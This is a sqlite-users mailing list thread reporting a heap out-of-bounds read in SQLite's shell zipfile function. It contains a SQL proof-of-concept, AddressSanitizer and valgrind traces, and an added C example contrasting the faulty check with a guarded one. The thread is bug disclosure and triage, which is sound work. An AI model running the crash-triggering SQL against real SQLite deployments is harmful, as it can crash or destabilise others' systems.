Re: [sqlite] Heap Out of Bound Read in Sqlite
Yongheng Chen wrote:
> This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When
> I use this specific version to compile sqlite, the problem can be repro.

Unlikely to be a compiler issue. I can reproduce the bug with valgrind with SQLite shell built with:

* gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
* or clang-6.0.0-1ubuntu2

Dominique

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
On Tue, Dec 24, 2019 at 5:48 PM Richard Hipp wrote:
>
> On 12/24/19, Yongheng Chen wrote:
> >
> > When we run it with sqlite compiled with asan, we got a heap overflow crash.
> >
> > The bug exists in the latest development code.
>
> Unable to repro. Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.

Hi

I just tried the latest from trunk in fossil (1c0a05b09 2019-12-24 16:20:05 UTC) and I can reproduce the bug when running with valgrind:

$ valgrind ./sqlite3
==6674== Memcheck, a memory error detector
==6674== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==6674== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==6674== Command: ./sqlite3
==6674==
SQLite version 3.31.0 2019-12-24 16:20:05
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
==6674== Invalid read of size 1
==6674==    at 0x12944E: zipfileStep (shell.c:6243)
==6674==    by 0x1B8711: sqlite3VdbeExec (sqlite3.c:91052)
==6674==    by 0x1BD58F: sqlite3Step (sqlite3.c:82703)
==6674==    by 0x1BD58F: sqlite3_step (sqlite3.c:82768)
==6674==    by 0x13161D: exec_prepared_stmt (shell.c:11379)
==6674==    by 0x13161D: shell_exec (shell.c:11684)
==6674==    by 0x132C7B: runOneSqlLine (shell.c:18265)
==6674==    by 0x13CCE4: process_input (shell.c:18365)
==6674==    by 0x11DD65: main (shell.c:19123)
==6674==  Address 0x5d15ccf is 1 bytes before a block of size 120,000 alloc'd
==6674==    at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==6674==    by 0x16AAF0: sqlite3MemMalloc (sqlite3.c:23180)
==6674==    by 0x1459E1: mallocWithAlarm (sqlite3.c:27071)
==6674==    by 0x1459E1: sqlite3Malloc (sqlite3.c:27101)
==6674==    by 0x1516A4: setupLookaside (sqlite3.c:158620)
==6674==    by 0x1E463D: openDatabase (sqlite3.c:161240)
==6674==    by 0x1327FF: open_db.part.64 (shell.c:12696)
==6674==    by 0x132EA6: open_db (stdio2.h:97)
==6674==    by 0x132EA6: runOneSqlLine (shell.c:18261)
==6674==    by 0x13CCE4: process_input (shell.c:18365)
==6674==    by 0x11DD65: main (shell.c:19123)
==6674==
0|NULL
sqlite>

Line where overflow is detected in shell.c:6243:

  6242   }else{
! 6243     if( zName[nName-1]!='/' ){
  6244       zName = zFree = sqlite3_mprintf("%s/", zName);

Regards
Dominique
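The check Dominique quotes at shell.c:6243, modelled as an added C example (not SQLite's own code): the unguarded form beside a guarded one, plus a small harness that places a known byte in front of the name so the empty-name read past the start of the string is observable without a sanitizer. The guarded variant's handling of an empty name (reject it) is an assumption for this example, not the project's actual fix.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Shape of the check at shell.c:6243 quoted in the thread: a directory
   entry name must end in '/', so the last byte is inspected. With an
   empty name nName is 0 and the index is -1: one byte before the heap
   block, which is what valgrind ("1 bytes before a block") and ASan
   ("1 bytes to the left of ... region") reported for the PoC's '' value. */
static int needs_slash_unguarded(const char *zName, int nName){
  return zName[nName-1] != '/';
}

/* Hardened form (assumption for this example, not SQLite's actual fix):
   refuse an empty name before indexing, then look at the last byte. */
static int needs_slash_guarded(const char *zName, int nName, int *pErr){
  *pErr = 0;
  if( nName<=0 ){
    *pErr = 1;               /* nothing to index; caller reports an error */
    return 0;
  }
  return zName[nName-1] != '/';
}

/* Harness: copy the name one byte into a larger allocation and put a chosen
   byte in front of it, so the out-of-bounds read of the unguarded check
   lands on that byte instead of on whatever precedes a real heap block
   (the same idea as an ASan redzone, but observable without a sanitizer). */
static int probe_unguarded(const char *name, char before){
  int n = (int)strlen(name);
  char *buf = malloc((size_t)n + 2);
  if( buf==0 ) return -1;
  buf[0] = before;
  memcpy(buf + 1, name, (size_t)n + 1);   /* name plus its NUL */
  int r = needs_slash_unguarded(buf + 1, n);
  free(buf);
  return r;
}

int main(void){
  int err = 0;
  /* For the empty name the answer depends on a byte outside the string. */
  printf("unguarded(\"\", before='/') = %d\n", probe_unguarded("", '/'));
  printf("unguarded(\"\", before='x') = %d\n", probe_unguarded("", 'x'));
  int g = needs_slash_guarded("", 0, &err);
  printf("guarded(\"\") = %d, err=%d\n", g, err);
  printf("guarded(\"dir\") = %d\n", needs_slash_guarded("dir", 3, &err));
  return 0;
}
```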
Re: [sqlite] Heap Out of Bound Read in Sqlite
This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When I use this specific version to compile sqlite, the problem can be repro. Just in case you need it, here’s the log I got:

—
SQLite version 3.31.0 2019-12-24 15:35:53
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
==25839==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x634007ff at pc 0x0042c622 bp 0x7ffe62feaf20 sp 0x7ffe62feaf10
READ of size 1 at 0x634007ff thread T0
    #0 0x42c621 in zipfileStep /data/xxx/sqlite/asan/shell.c:6243
    #1 0x5a30f6 in sqlite3VdbeExec /data/xxx/sqlite/asan/sqlite3.c:91052
    #2 0x5c155e in sqlite3Step /data/xxx/sqlite/asan/sqlite3.c:82703
    #3 0x5c155e in sqlite3_step /data/xxx/sqlite/asan/sqlite3.c:82768
    #4 0x436e0d in exec_prepared_stmt /data/xxx/sqlite/asan/shell.c:11379
    #5 0x43da53 in shell_exec /data/xxx/sqlite/asan/shell.c:11684
    #6 0x440631 in runOneSqlLine /data/xxx/sqlite/asan/shell.c:18265
    #7 0x450f95 in process_input /data/xxx/sqlite/asan/shell.c:18365
    #8 0x412a65 in main /data/xxx/sqlite/asan/shell.c:19123
    #9 0x7fc3b2a9d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #10 0x413e18 in _start (/data/xxx/sqlite/asan/sqlite3+0x413e18)

0x634007ff is located 1 bytes to the left of 12-byte region [0x63400800,0x6341dcc0)
allocated by thread T0 here:
    #0 0x7fc3b3754662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662)
    #1 0x4d2ea0 in sqlite3MemMalloc /data/xxx/sqlite/asan/sqlite3.c:23180
—

Yongheng Chen

> On Dec 24, 2019, at 11:48 AM, Richard Hipp wrote:
>
> On 12/24/19, Yongheng Chen wrote:
>>
>> When we run it with sqlite compiled with asan, we got a heap overflow crash.
>>
>> The bug exists in the latest development code.
>
> Unable to repro. Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.
>
>
> --
> D. Richard Hipp
> d...@sqlite.org
Re: [sqlite] Heap Out of Bound Read in Sqlite
On 12/24/19, Yongheng Chen wrote:
>
> When we run it with sqlite compiled with asan, we got a heap overflow crash.
>
> The bug exists in the latest development code.

Unable to repro. Tried tip of trunk and release, using gcc and clang,
all with various combinations of -fsanitize=memory,
-fsanitize=address, -fsanitize=undefined, and running under valgrind.

--
D. Richard Hipp
d...@sqlite.org
[sqlite] Heap Out of Bound Read in Sqlite
Hi,

We found an oob read in sqlite. Here’s the PoC:

—
CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
—

When we run it with sqlite compiled with asan, we got a heap overflow crash.

The bug exists in the latest development code.

Yongheng & Rui